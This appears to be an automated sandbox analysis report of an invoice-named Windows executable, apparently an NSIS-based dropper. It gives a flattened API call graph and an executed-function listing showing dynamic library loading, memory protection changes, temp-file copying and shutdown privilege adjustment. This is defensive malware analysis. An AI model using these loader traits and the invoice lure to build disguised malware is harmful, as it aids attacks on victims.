5745 402d98 RegEnumKeyW 5745->5746 5747 402daf RegCloseKey 5745->5747 5746->5744 5746->5745 5746->5747 5748 402dd0 RegCloseKey 5746->5748 5750 402d44 6 API calls 5746->5750 5749 40665e 5 API calls 5747->5749 5748->5744 5751 402dbf 5749->5751 5750->5746 5751->5744 5752 402de0 RegDeleteKeyW 5751->5752 5752->5744 5753 40698e 5754 406812 5753->5754 5755 40717d 5754->5755 5756 406893 GlobalFree 5754->5756 5757 40689c GlobalAlloc 5754->5757 5758 406913 GlobalAlloc 5754->5758 5759 40690a GlobalFree 5754->5759 5756->5757 5757->5754 5757->5755 5758->5754 5758->5755 5759->5758 5760 40190f 5761 402c41 17 API calls 5760->5761 5762 401916 5761->5762 5763 4058ea MessageBoxIndirectW 5762->5763 5764 40191f 5763->5764 5765 401491 5766 4052ec 24 API calls 5765->5766 5767 401498 5766->5767 5768 401d14 5769 402c1f 17 API calls 5768->5769 5770 401d1b 5769->5770 5771 402c1f 17 API calls 5770->5771 5772 401d27 GetDlgItem 5771->5772 5773 402592 5772->5773 5781 402598 5782 4025c7 5781->5782 5783 4025ac 5781->5783 5785 4025fb 5782->5785 5786 4025cc 5782->5786 5784 402c1f 17 API calls 5783->5784 5788 4025b3 5784->5788 5787 402c41 17 API calls 5785->5787 5789 402c41 17 API calls 5786->5789 5791 402602 lstrlenW 5787->5791 5792 402645 5788->5792 5793 40262f 5788->5793 5795 405e5b 5 API calls 5788->5795 5790 4025d3 WideCharToMultiByte lstrlenA 5789->5790 5790->5788 5791->5788 5793->5792 5794 405e2c WriteFile 5793->5794 5794->5792 5795->5793 5796 40149e 5797 4022f7 5796->5797 5798 4014ac PostQuitMessage 5796->5798 5798->5797 5799 401c1f 5800 402c1f 17 API calls 5799->5800 5801 401c26 5800->5801 5802 402c1f 17 API calls 5801->5802 5803 401c33 5802->5803 5804 401c48 5803->5804 5805 402c41 17 API calls 5803->5805 5806 402c41 17 API calls 5804->5806 5811 401c58 5804->5811 5805->5804 5806->5811 5807 401c63 5809 402c1f 17 API calls 5807->5809 5808 401caf 5810 402c41 17 API calls 5808->5810 5812 401c68 5809->5812 5813 401cb4 5810->5813 5811->5807 5811->5808 5814 402c1f 17 API calls 5812->5814 5815 402c41 17 API calls 5813->5815 5816 401c74 5814->5816 5817 401cbd FindWindowExW 5815->5817 5818 401c81 SendMessageTimeoutW 5816->5818 5819 401c9f SendMessageW 5816->5819 5820 401cdf 5817->5820 5818->5820 5819->5820 5821 402aa0 SendMessageW 5822 402ac5 5821->5822 5823 402aba InvalidateRect 5821->5823 5823->5822 5824 402821 5825 402827 5824->5825 5826 402ac5 5825->5826 5827 40282f FindClose 5825->5827 5827->5826 4381 403d22 4382 403e75 4381->4382 4383 403d3a 4381->4383 4384 403e86 GetDlgItem GetDlgItem 4382->4384 4393 403ec6 4382->4393 4383->4382 4385 403d46 4383->4385 4386 4041fb 18 API calls 4384->4386 4388 403d51 SetWindowPos 4385->4388 4389 403d64 4385->4389 4392 403eb0 SetClassLongW 4386->4392 4387 403f20 4399 403e70 4387->4399 4452 404247 4387->4452 4388->4389 4390 403d81 4389->4390 4391 403d69 ShowWindow 4389->4391 4395 403da3 4390->4395 4396 403d89 DestroyWindow 4390->4396 4391->4390 4397 40140b 2 API calls 4392->4397 4393->4387 4398 401389 2 API calls 4393->4398 4401 403da8 SetWindowLongW 4395->4401 4402 403db9 4395->4402 4400 404184 4396->4400 4397->4393 4403 403ef8 4398->4403 4400->4399 4409 4041b5 ShowWindow 4400->4409 4401->4399 4406 403e62 4402->4406 4407 403dc5 GetDlgItem 4402->4407 4403->4387 4408 403efc SendMessageW 4403->4408 4404 40140b 2 API calls 4422 403f32 4404->4422 4405 404186 DestroyWindow EndDialog 4405->4400 4474 404262 4406->4474 4410 403df5 4407->4410 4411 403dd8 SendMessageW IsWindowEnabled 4407->4411 4408->4399 4409->4399 4414 403e02 4410->4414 4417 403e49 SendMessageW 4410->4417 4418 403e15 4410->4418 4425 403dfa 4410->4425 4411->4399 4411->4410 4413 4062a6 17 API calls 4413->4422 4414->4417 4414->4425 4416 4041fb 18 API calls 4416->4422 4417->4406 4419 403e32 4418->4419 4420 403e1d 4418->4420 4424 40140b 2 API calls 4419->4424 4468 40140b 4420->4468 4421 403e30 4421->4406 4422->4399 4422->4404 4422->4405 4422->4413 4422->4416 4443 4040c6 DestroyWindow 4422->4443 4455 4041fb 4422->4455 4426 403e39 4424->4426 4471 4041d4 4425->4471 4426->4406 4426->4425 4428 403fad GetDlgItem 4429 403fc2 4428->4429 4430 403fca ShowWindow KiUserCallbackDispatcher 4428->4430 4429->4430 4458 40421d KiUserCallbackDispatcher 4430->4458 4432 403ff4 EnableWindow 4437 404008 4432->4437 4433 40400d GetSystemMenu EnableMenuItem SendMessageW 4434 40403d SendMessageW 4433->4434 4433->4437 4434->4437 4437->4433 4459 404230 SendMessageW 4437->4459 4460 403d03 4437->4460 4463 406284 lstrcpynW 4437->4463 4439 40406c lstrlenW 4440 4062a6 17 API calls 4439->4440 4441 404082 SetWindowTextW 4440->4441 4464 401389 4441->4464 4443->4400 4444 4040e0 CreateDialogParamW 4443->4444 4444->4400 4445 404113 4444->4445 4446 4041fb 18 API calls 4445->4446 4447 40411e GetDlgItem GetWindowRect ScreenToClient SetWindowPos 4446->4447 4448 401389 2 API calls 4447->4448 4449 404164 4448->4449 4449->4399 4450 40416c ShowWindow 4449->4450 4451 404247 SendMessageW 4450->4451 4451->4400 4453 404250 SendMessageW 4452->4453 4454 40425f 4452->4454 4453->4454 4454->4422 4456 4062a6 17 API calls 4455->4456 4457 404206 SetDlgItemTextW 4456->4457 4457->4428 4458->4432 4459->4437 4461 4062a6 17 API calls 4460->4461 4462 403d11 SetWindowTextW 4461->4462 4462->4437 4463->4439 4465 401390 4464->4465 4466 4013fe 4465->4466 4467 4013cb MulDiv SendMessageW 4465->4467 4466->4422 4467->4465 4469 401389 2 API calls 4468->4469 4470 401420 4469->4470 4470->4425 4472 4041e1 SendMessageW 4471->4472 4473 4041db 4471->4473 4472->4421 4473->4472 4475 404325 4474->4475 4476 40427a GetWindowLongW 4474->4476 4475->4399 4476->4475 4477 40428f 4476->4477 4477->4475 4478 4042bc GetSysColor 4477->4478 4479 4042bf 4477->4479 4478->4479 4480 4042c5 SetTextColor 4479->4480 4481 4042cf SetBkMode 4479->4481 4480->4481 4482 4042e7 GetSysColor 4481->4482 4483 4042ed 4481->4483 4482->4483 4484 4042f4 SetBkColor 4483->4484 4485 4042fe 4483->4485 4484->4485 4485->4475 4486 404311 DeleteObject 4485->4486 4487 404318 CreateBrushIndirect 4485->4487 4486->4487 4487->4475 4488 6ff42997 4489 6ff429e7 4488->4489 4490 6ff429a7 VirtualProtect 4488->4490 4490->4489 5828 4015a3 5829 402c41 17 API calls 5828->5829 5830 4015aa SetFileAttributesW 5829->5830 5831 4015bc 5830->5831 5832 4046a5 5833 4046b5 5832->5833 5834 4046db 5832->5834 5835 4041fb 18 API calls 5833->5835 5836 404262 8 API calls 5834->5836 5837 4046c2 SetDlgItemTextW 5835->5837 5838 4046e7 5836->5838 5837->5834 5839 4029a8 5840 402c1f 17 API calls 5839->5840 5841 4029ae 5840->5841 5842 4029d5 5841->5842 5843 4029ee 5841->5843 5847 40288b 5841->5847 5844 4029da 5842->5844 5852 4029eb 5842->5852 5845 402a08 5843->5845 5846 4029f8 5843->5846 5853 406284 lstrcpynW 5844->5853 5849 4062a6 17 API calls 5845->5849 5848 402c1f 17 API calls 5846->5848 5848->5852 5849->5852 5852->5847 5854 4061cb wsprintfW 5852->5854 5853->5847 5854->5847 4502 40542b 4503 4055d5 4502->4503 4504 40544c GetDlgItem GetDlgItem GetDlgItem 4502->4504 4506 405606 4503->4506 4507 4055de GetDlgItem CreateThread CloseHandle 4503->4507 4548 404230 SendMessageW 4504->4548 4509 405631 4506->4509 4510 405656 4506->4510 4511 40561d ShowWindow ShowWindow 4506->4511 4507->4506 4551 4053bf OleInitialize 4507->4551 4508 4054bc 4518 4054c3 GetClientRect GetSystemMetrics SendMessageW SendMessageW 4508->4518 4512 405691 4509->4512 4513 40563d 4509->4513 4517 404262 8 API calls 4510->4517 4550 404230 SendMessageW 4511->4550 4512->4510 4519 40569f SendMessageW 4512->4519 4515 405645 4513->4515 4516 40566b ShowWindow 4513->4516 4520 4041d4 SendMessageW 4515->4520 4522 40568b 4516->4522 4523 40567d 4516->4523 4521 405664 4517->4521 4524 405531 4518->4524 4525 405515 SendMessageW SendMessageW 4518->4525 4519->4521 4526 4056b8 CreatePopupMenu 4519->4526 4520->4510 4530 4041d4 SendMessageW 4522->4530 4529 4052ec 24 API calls 4523->4529 4527 405544 4524->4527 4528 405536 SendMessageW 4524->4528 4525->4524 4531 4062a6 17 API calls 4526->4531 4532 4041fb 18 API calls 4527->4532 4528->4527 4529->4522 4530->4512 4533 4056c8 AppendMenuW 4531->4533 4534 405554 4532->4534 4535 4056e5 GetWindowRect 4533->4535 4536 4056f8 TrackPopupMenu 4533->4536 4537 405591 GetDlgItem SendMessageW 4534->4537 4538 40555d ShowWindow 4534->4538 4535->4536 4536->4521 4539 405713 4536->4539 4537->4521 4542 4055b8 SendMessageW SendMessageW 4537->4542 4540 405580 4538->4540 4541 405573 ShowWindow 4538->4541 4543 40572f SendMessageW 4539->4543 4549 404230 SendMessageW 4540->4549 4541->4540 4542->4521 4543->4543 4544 40574c OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 4543->4544 4546 405771 SendMessageW 4544->4546 4546->4546 4547 40579a GlobalUnlock SetClipboardData CloseClipboard 4546->4547 4547->4521 4548->4508 4549->4537 4550->4509 4552 404247 SendMessageW 4551->4552 4553 4053e2 4552->4553 4556 401389 2 API calls 4553->4556 4557 405409 4553->4557 4554 404247 SendMessageW 4555 40541b OleUninitialize 4554->4555 4556->4553 4557->4554 5862 4028ad 5863 402c41 17 API calls 5862->5863 5865 4028bb 5863->5865 5864 4028d1 5867 405d55 2 API calls 5864->5867 5865->5864 5866 402c41 17 API calls 5865->5866 5866->5864 5868 4028d7 5867->5868 5890 405d7a GetFileAttributesW CreateFileW 5868->5890 5870 4028e4 5871 4028f0 GlobalAlloc 5870->5871 5872 402987 5870->5872 5873 402909 5871->5873 5874 40297e CloseHandle 5871->5874 5875 4029a2 5872->5875 5876 40298f DeleteFileW 5872->5876 5891 403311 SetFilePointer 5873->5891 5874->5872 5876->5875 5878 40290f 5879 4032fb ReadFile 5878->5879 5880 402918 GlobalAlloc 5879->5880 5881 402928 5880->5881 5882 40295c 5880->5882 5884 403116 35 API calls 5881->5884 5883 405e2c WriteFile 5882->5883 5885 402968 GlobalFree 5883->5885 5889 402935 5884->5889 5886 403116 35 API calls 5885->5886 5887 40297b 5886->5887 5887->5874 5888 402953 GlobalFree 5888->5882 5889->5888 5890->5870 5891->5878 5892 401a30 5893 402c41 17 API calls 5892->5893 5894 401a39 ExpandEnvironmentStringsW 5893->5894 5895 401a4d 5894->5895 5897 401a60 5894->5897 5896 401a52 lstrcmpW 5895->5896 5895->5897 5896->5897 5898 404331 lstrcpynW lstrlenW 4645 402032 4646 402044 4645->4646 4647 4020f6 4645->4647 4648 402c41 17 API calls 4646->4648 4649 401423 24 API calls 4647->4649 4650 40204b 4648->4650 4656 402250 4649->4656 4651 402c41 17 API calls 4650->4651 4652 402054 4651->4652 4653 40206a LoadLibraryExW 4652->4653 4654 40205c GetModuleHandleW 4652->4654 4653->4647 4655 40207b 4653->4655 4654->4653 4654->4655 4668 4066cd WideCharToMultiByte 4655->4668 4659 4020c5 4661 4052ec 24 API calls 4659->4661 4660 40208c 4662 402094 4660->4662 4663 4020ab 4660->4663 4664 40209c 4661->4664 4665 401423 24 API calls 4662->4665 4671 6ff4177b 4663->4671 4664->4656 4666 4020e8 FreeLibrary 4664->4666 4665->4664 4666->4656 4669 4066f7 GetProcAddress 4668->4669 4670 402086 4668->4670 4669->4670 4670->4659 4670->4660 4672 6ff417ae 4671->4672 4713 6ff41b63 4672->4713 4674 6ff417b5 4675 6ff418da 4674->4675 4676 6ff417c6 4674->4676 4677 6ff417cd 4674->4677 4675->4664 4763 6ff42356 4676->4763 4747 6ff42398 4677->4747 4682 6ff41831 4688 6ff41837 4682->4688 4689 6ff41882 4682->4689 4683 6ff41813 4776 6ff4256d 4683->4776 4684 6ff417e3 4687 6ff417e9 4684->4687 4693 6ff417f4 4684->4693 4685 6ff417fc 4697 6ff417f2 4685->4697 4773 6ff42d2f 4685->4773 4687->4697 4757 6ff42a74 4687->4757 4795 6ff415c6 4688->4795 4691 6ff4256d 10 API calls 4689->4691 4698 6ff41873 4691->4698 4692 6ff41819 4787 6ff415b4 4692->4787 4767 6ff42728 4693->4767 4697->4682 4697->4683 4704 6ff418c9 4698->4704 4802 6ff42530 4698->4802 4701 6ff4256d 10 API calls 4701->4698 4703 6ff417fa 4703->4697 4704->4675 4706 6ff418d3 GlobalFree 4704->4706 4706->4675 4710 6ff418b5 4710->4704 4806 6ff4153d wsprintfW 4710->4806 4711 6ff418ae FreeLibrary 4711->4710 4809 6ff4121b GlobalAlloc 4713->4809 4715 6ff41b87 4810 6ff4121b GlobalAlloc 4715->4810 4717 6ff41dad GlobalFree GlobalFree GlobalFree 4718 6ff41dca 4717->4718 4733 6ff41e14 4717->4733 4719 6ff42196 4718->4719 4728 6ff41ddf 4718->4728 4718->4733 4721 6ff421b8 GetModuleHandleW 4719->4721 4719->4733 4720 6ff41c68 GlobalAlloc 4742 6ff41b92 4720->4742 4723 6ff421de 4721->4723 4724 6ff421c9 LoadLibraryW 4721->4724 4722 6ff41cd1 GlobalFree 4722->4742 4817 6ff41621 WideCharToMultiByte GlobalAlloc WideCharToMultiByte GetProcAddress GlobalFree 4723->4817 4724->4723 4724->4733 4725 6ff41cb3 lstrcpyW 4726 6ff41cbd lstrcpyW 4725->4726 4726->4742 4728->4733 4813 6ff4122c 4728->4813 4729 6ff42230 4731 6ff4223d lstrlenW 4729->4731 4729->4733 4818 6ff41621 WideCharToMultiByte GlobalAlloc WideCharToMultiByte GetProcAddress GlobalFree 4731->4818 4732 6ff42068 4816 6ff4121b GlobalAlloc 4732->4816 4733->4674 4734 6ff421f0 4734->4729 4745 6ff4221a GetProcAddress 4734->4745 4735 6ff420f0 4735->4733 4740 6ff42138 lstrcpyW 4735->4740 4738 6ff41d0f 4738->4742 4811 6ff4158f GlobalSize GlobalAlloc 4738->4811 4739 6ff41fa9 GlobalFree 4739->4742 4740->4733 4741 6ff42257 4741->4733 4742->4717 4742->4720 4742->4722 4742->4725 4742->4726 4742->4732 4742->4733 4742->4735 4742->4738 4742->4739 4744 6ff4122c 2 API calls 4742->4744 4744->4742 4745->4729 4746 6ff42071 4746->4674 4754 6ff423b0 4747->4754 4748 6ff4122c GlobalAlloc lstrcpynW 4748->4754 4750 6ff424d9 GlobalFree 4753 6ff417d3 4750->4753 4750->4754 4751 6ff42483 GlobalAlloc CLSIDFromString 4751->4750 4752 6ff42458 GlobalAlloc WideCharToMultiByte 4752->4750 4753->4684 4753->4685 4753->4697 4754->4748 4754->4750 4754->4751 4754->4752 4756 6ff424a2 4754->4756 4820 6ff412ba 4754->4820 4756->4750 4824 6ff426bc 4756->4824 4759 6ff42a86 4757->4759 4758 6ff42b2b ReadFile 4760 6ff42b49 4758->4760 4759->4758 4761 6ff42c45 4760->4761 4762 6ff42c3a GetLastError 4760->4762 4761->4697 4762->4761 4764 6ff4236b 4763->4764 4765 6ff417cc 4764->4765 4766 6ff42376 GlobalAlloc 4764->4766 4765->4677 4766->4764 4771 6ff42758 4767->4771 4768 6ff42806 4770 6ff4280c GlobalSize 4768->4770 4772 6ff42816 4768->4772 4769 6ff427f3 GlobalAlloc 4769->4772 4770->4772 4771->4768 4771->4769 4772->4703 4774 6ff42d3a 4773->4774 4775 6ff42d7a GlobalFree 4774->4775 4827 6ff4121b GlobalAlloc 4776->4827 4778 6ff425f0 MultiByteToWideChar 4781 6ff42577 4778->4781 4779 6ff42612 StringFromGUID2 4779->4781 4780 6ff42623 lstrcpynW 4780->4781 4781->4778 4781->4779 4781->4780 4782 6ff42636 wsprintfW 4781->4782 4783 6ff4265a GlobalFree 4781->4783 4784 6ff4268f GlobalFree 4781->4784 4785 6ff41272 2 API calls 4781->4785 4828 6ff412e1 4781->4828 4782->4781 4783->4781 4784->4692 4785->4781 4832 6ff4121b GlobalAlloc 4787->4832 4789 6ff415b9 4790 6ff415c6 2 API calls 4789->4790 4791 6ff415c3 4790->4791 4792 6ff41272 4791->4792 4793 6ff412b5 GlobalFree 4792->4793 4794 6ff4127b GlobalAlloc lstrcpynW 4792->4794 4793->4698 4794->4793 4796 6ff415e4 4795->4796 4797 6ff415d6 lstrcpyW 4795->4797 4796->4797 4800 6ff415f0 4796->4800 4799 6ff4161d 4797->4799 4799->4701 4800->4799 4801 6ff4160d wsprintfW 4800->4801 4801->4799 4803 6ff41895 4802->4803 4804 6ff4253e 4802->4804 4803->4710 4803->4711 4804->4803 4805 6ff4255a GlobalFree 4804->4805 4805->4804 4807 6ff41272 2 API calls 4806->4807 4808 6ff4155e 4807->4808 4808->4704 4809->4715 4810->4742 4812 6ff415ad 4811->4812 4812->4738 4819 6ff4121b GlobalAlloc 4813->4819 4815 6ff4123b lstrcpynW 4815->4733 4816->4746 4817->4734 4818->4741 4819->4815 4821 6ff412c1 4820->4821 4822 6ff4122c 2 API calls 4821->4822 4823 6ff412df 4822->4823 4823->4754 4825 6ff42720 4824->4825 4826 6ff426ca VirtualAlloc 4824->4826 4825->4756 4826->4825 4827->4781 4829 6ff4130c 4828->4829 4830 6ff412ea 4828->4830 4829->4781 4830->4829 4831 6ff412f0 lstrcpyW 4830->4831 4831->4829 4832->4789 5899 403932 5900 40393d 5899->5900 5901 403941 5900->5901 5902 403944 GlobalAlloc 5900->5902 5902->5901 5908 6ff41000 5909 6ff4101b 5 API calls 5908->5909 5910 6ff41019 5909->5910 5911 402a35 5912 402c1f 17 API calls 5911->5912 5913 402a3b 5912->5913 5914 402a72 5913->5914 5915 40288b 5913->5915 5917 402a4d 5913->5917 5914->5915 5916 4062a6 17 API calls 5914->5916 5916->5915 5917->5915 5919 4061cb wsprintfW 5917->5919 5919->5915 5920 401735 5921 402c41 17 API calls 5920->5921 5922 40173c SearchPathW 5921->5922 5923 4029e6 5922->5923 5924 401757 5922->5924 5924->5923 5926 406284 lstrcpynW 5924->5926 5926->5923 5927 6ff42301 5928 6ff4236b 5927->5928 5929 6ff42395 5928->5929 5930 6ff42376 GlobalAlloc 5928->5930 5930->5928 5931 4014b8 5932 4014be 5931->5932 5933 401389 2 API calls 5932->5933 5934 4014c6 5933->5934 5935 401db9 GetDC 5936 402c1f 17 API calls 5935->5936 5937 401dcb GetDeviceCaps MulDiv ReleaseDC 5936->5937 5938 402c1f 17 API calls 5937->5938 5939 401dfc 5938->5939 5940 4062a6 17 API calls 5939->5940 5941 401e39 CreateFontIndirectW 5940->5941 5942 402592 5941->5942 5943 4043ba 5944 4043d2 5943->5944 5945 4044ec 5943->5945 5950 4041fb 18 API calls 5944->5950 5946 404556 5945->5946 5947 404620 5945->5947 5954 404527 GetDlgItem SendMessageW 5945->5954 5946->5947 5948 404560 GetDlgItem 5946->5948 5952 404262 8 API calls 5947->5952 5949 40457a 5948->5949 5953 4045e1 5948->5953 5949->5953 5957 4045a0 SendMessageW LoadCursorW SetCursor 5949->5957 5951 404439 5950->5951 5955 4041fb 18 API calls 5951->5955 5956 40461b 5952->5956 5953->5947 5958 4045f3 5953->5958 5976 40421d KiUserCallbackDispatcher 5954->5976 5960 404446 CheckDlgButton 5955->5960 5977 404669 5957->5977 5962 404609 5958->5962 5963 4045f9 SendMessageW 5958->5963 5974 40421d KiUserCallbackDispatcher 5960->5974 5962->5956 5968 40460f SendMessageW 5962->5968 5963->5962 5964 404551 5965 404645 SendMessageW 5964->5965 5965->5946 5968->5956 5969 404464 GetDlgItem 5975 404230 SendMessageW 5969->5975 5971 40447a SendMessageW 5972 4044a0 SendMessageW SendMessageW lstrlenW SendMessageW SendMessageW 5971->5972 5973 404497 GetSysColor 5971->5973 5972->5956 5973->5972 5974->5969 5975->5971 5976->5964 5980 4058b0 ShellExecuteExW 5977->5980 5979 4045cf LoadCursorW SetCursor 5979->5953 5980->5979 5981 40283b 5982 402843 5981->5982 5983 402847 FindNextFileW 5982->5983 5984 402859 5982->5984 5983->5984 5985 4029e6 5984->5985 5987 406284 lstrcpynW 5984->5987 5987->5985

                                                                                                                                  Executed Functions

                                                                                                                                  Function 00403359 Relevance: 86.2, APIs: 32, Strings: 17, Instructions: 410stringfilecomCOMMON
                                                                                                                                  Download Yara Rule

                                                                                                                                  Control-flow Graph

                                                                                                                                  • Executed
                                                                                                                                  • Not Executed
                                                                                                                                  control_flow_graph 0 403359-403396 SetErrorMode GetVersion 1 403398-4033a0 call 40665e 0->1 2 4033a9 0->2 1->2 7 4033a2 1->7 4 4033ae-4033c2 call 4065ee lstrlenA 2->4 9 4033c4-4033e0 call 40665e * 3 4->9 7->2 16 4033f1-403450 #17 OleInitialize SHGetFileInfoW call 406284 GetCommandLineW call 406284 9->16 17 4033e2-4033e8 9->17 24 403452-403459 16->24 25 40345a-403474 call 405b86 CharNextW 16->25 17->16 21 4033ea 17->21 21->16 24->25 28 40347a-403480 25->28 29 40358b-4035a5 GetTempPathW call 403328 25->29 31 403482-403487 28->31 32 403489-40348d 28->32 38 4035a7-4035c5 GetWindowsDirectoryW lstrcatW call 403328 29->38 39 4035fd-403617 DeleteFileW call 402edd 29->39 31->31 31->32 34 403494-403498 32->34 35 40348f-403493 32->35 36 403557-403564 call 405b86 34->36 37 40349e-4034a4 34->37 35->34 57 403566-403567 36->57 58 403568-40356e 36->58 40 4034a6-4034ae 37->40 41 4034bf-4034f8 37->41 38->39 56 4035c7-4035f7 GetTempPathW lstrcatW SetEnvironmentVariableW * 2 call 403328 38->56 52 4036c8-4036d8 call 40389a OleUninitialize 39->52 53 40361d-403623 39->53 46 4034b0-4034b3 40->46 47 4034b5 40->47 48 403515-40354f 41->48 49 4034fa-4034ff 41->49 46->41 46->47 47->41 48->36 55 403551-403555 48->55 49->48 54 403501-403509 49->54 75 4037fe-403804 52->75 76 4036de-4036ee call 4058ea ExitProcess 52->76 60 4036b8-4036bf call 403974 53->60 61 403629-403634 call 405b86 53->61 63 403510 54->63 64 40350b-40350e 54->64 55->36 65 403576-403584 call 406284 55->65 56->39 56->52 57->58 58->28 59 403574 58->59 67 403589 59->67 74 4036c4 60->74 77 403682-40368c 61->77 78 403636-40366b 61->78 63->48 64->48 64->63 65->67 67->29 74->52 80 403882-40388a 75->80 81 403806-40381c GetCurrentProcess OpenProcessToken 75->81 85 4036f4-403708 call 405855 lstrcatW 77->85 86 40368e-40369c call 405c61 77->86 82 40366d-403671 78->82 83 403890-403894 ExitProcess 80->83 84 40388c 80->84 88 403852-403860 call 40665e 81->88 89 40381e-40384c LookupPrivilegeValueW AdjustTokenPrivileges 81->89 91 403673-403678 82->91 92 40367a-40367e 82->92 84->83 102 403715-40372f lstrcatW lstrcmpiW 85->102 103 40370a-403710 lstrcatW 85->103 86->52 101 40369e-4036b4 call 406284 * 2 86->101 99 403862-40386c 88->99 100 40386e-403879 ExitWindowsEx 88->100 89->88 91->92 96 403680 91->96 92->82 92->96 96->77 99->100 105 40387b-40387d call 40140b 99->105 100->80 100->105 101->60 102->52 104 403731-403734 102->104 103->102 108 403736-40373b call 4057bb 104->108 109 40373d call 405838 104->109 105->80 117 403742-403750 SetCurrentDirectoryW 108->117 109->117 118 403752-403758 call 406284 117->118 119 40375d-403786 call 406284 117->119 118->119 123 40378b-4037a7 call 4062a6 DeleteFileW 119->123 126 4037e8-4037f0 123->126 127 4037a9-4037b9 CopyFileW 123->127 126->123 129 4037f2-4037f9 call 40604a 126->129 127->126 128 4037bb-4037db call 40604a call 4062a6 call 40586d 127->128 128->126 138 4037dd-4037e4 CloseHandle 128->138 129->52 138->126
                                                                                                                                  APIs
                                                                                                                                  • SetErrorMode.KERNELBASE ref: 0040337C
                                                                                                                                  • GetVersion.KERNEL32 ref: 00403382
                                                                                                                                  • lstrlenA.KERNEL32(UXTHEME,UXTHEME), ref: 004033B5
                                                                                                                                  • #17.COMCTL32(?,00000006,00000008,0000000A), ref: 004033F2
                                                                                                                                  • OleInitialize.OLE32(00000000), ref: 004033F9
                                                                                                                                  • SHGetFileInfoW.SHELL32(004216A8,00000000,?,000002B4,00000000), ref: 00403415
                                                                                                                                  • GetCommandLineW.KERNEL32(00429200,NSIS Error,?,00000006,00000008,0000000A), ref: 0040342A
                                                                                                                                  • CharNextW.USER32(00000000,"C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe",00000020,"C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe",00000000,?,00000006,00000008,0000000A), ref: 00403462
                                                                                                                                    • Part of subcall function 0040665E: GetModuleHandleA.KERNEL32(?,00000020,?,004033CB,0000000A), ref: 00406670
                                                                                                                                    • Part of subcall function 0040665E: GetProcAddress.KERNEL32(00000000,?), ref: 0040668B
                                                                                                                                  • GetTempPathW.KERNEL32(00000400,C:\Users\user\AppData\Local\Temp\,?,00000006,00000008,0000000A), ref: 0040359C
                                                                                                                                  • GetWindowsDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB,?,00000006,00000008,0000000A), ref: 004035AD
                                                                                                                                  • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp,?,00000006,00000008,0000000A), ref: 004035B9
                                                                                                                                  • GetTempPathW.KERNEL32(000003FC,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,\Temp,?,00000006,00000008,0000000A), ref: 004035CD
                                                                                                                                  • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,Low,?,00000006,00000008,0000000A), ref: 004035D5
                                                                                                                                  • SetEnvironmentVariableW.KERNEL32(TEMP,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,Low,?,00000006,00000008,0000000A), ref: 004035E6
                                                                                                                                  • SetEnvironmentVariableW.KERNEL32(TMP,C:\Users\user\AppData\Local\Temp\,?,00000006,00000008,0000000A), ref: 004035EE
                                                                                                                                  • DeleteFileW.KERNELBASE(1033,?,00000006,00000008,0000000A), ref: 00403602
                                                                                                                                    • Part of subcall function 00406284: lstrcpynW.KERNEL32(?,?,00000400,0040342A,00429200,NSIS Error,?,00000006,00000008,0000000A), ref: 00406291
                                                                                                                                  • OleUninitialize.OLE32(00000006,?,00000006,00000008,0000000A), ref: 004036CD
                                                                                                                                  • ExitProcess.KERNEL32 ref: 004036EE
                                                                                                                                  • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe",00000000,00000006,?,00000006,00000008,0000000A), ref: 00403701
                                                                                                                                  • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,0040A26C,C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe",00000000,00000006,?,00000006,00000008,0000000A), ref: 00403710
                                                                                                                                  • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,.tmp,C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe",00000000,00000006,?,00000006,00000008,0000000A), ref: 0040371B
                                                                                                                                  • lstrcmpiW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\Desktop,C:\Users\user\AppData\Local\Temp\,.tmp,C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe",00000000,00000006,?,00000006,00000008,0000000A), ref: 00403727
                                                                                                                                  • SetCurrentDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,?,00000006,00000008,0000000A), ref: 00403743
                                                                                                                                  • DeleteFileW.KERNEL32(00420EA8,00420EA8,?,0042B000,00000008,?,00000006,00000008,0000000A), ref: 0040379D
                                                                                                                                  • CopyFileW.KERNEL32(C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe,00420EA8,00000001,?,00000006,00000008,0000000A), ref: 004037B1
                                                                                                                                  • CloseHandle.KERNEL32(00000000,00420EA8,00420EA8,?,00420EA8,00000000,?,00000006,00000008,0000000A), ref: 004037DE
                                                                                                                                  • GetCurrentProcess.KERNEL32(00000028,0000000A,00000006,00000008,0000000A), ref: 0040380D
                                                                                                                                  • OpenProcessToken.ADVAPI32(00000000), ref: 00403814
                                                                                                                                  • LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00403829
                                                                                                                                  • AdjustTokenPrivileges.ADVAPI32 ref: 0040384C
                                                                                                                                  • ExitWindowsEx.USER32(00000002,80040002), ref: 00403871
                                                                                                                                  • ExitProcess.KERNEL32 ref: 00403894
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1871642625.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1871626525.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1871665427.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1871685325.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1871685325.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
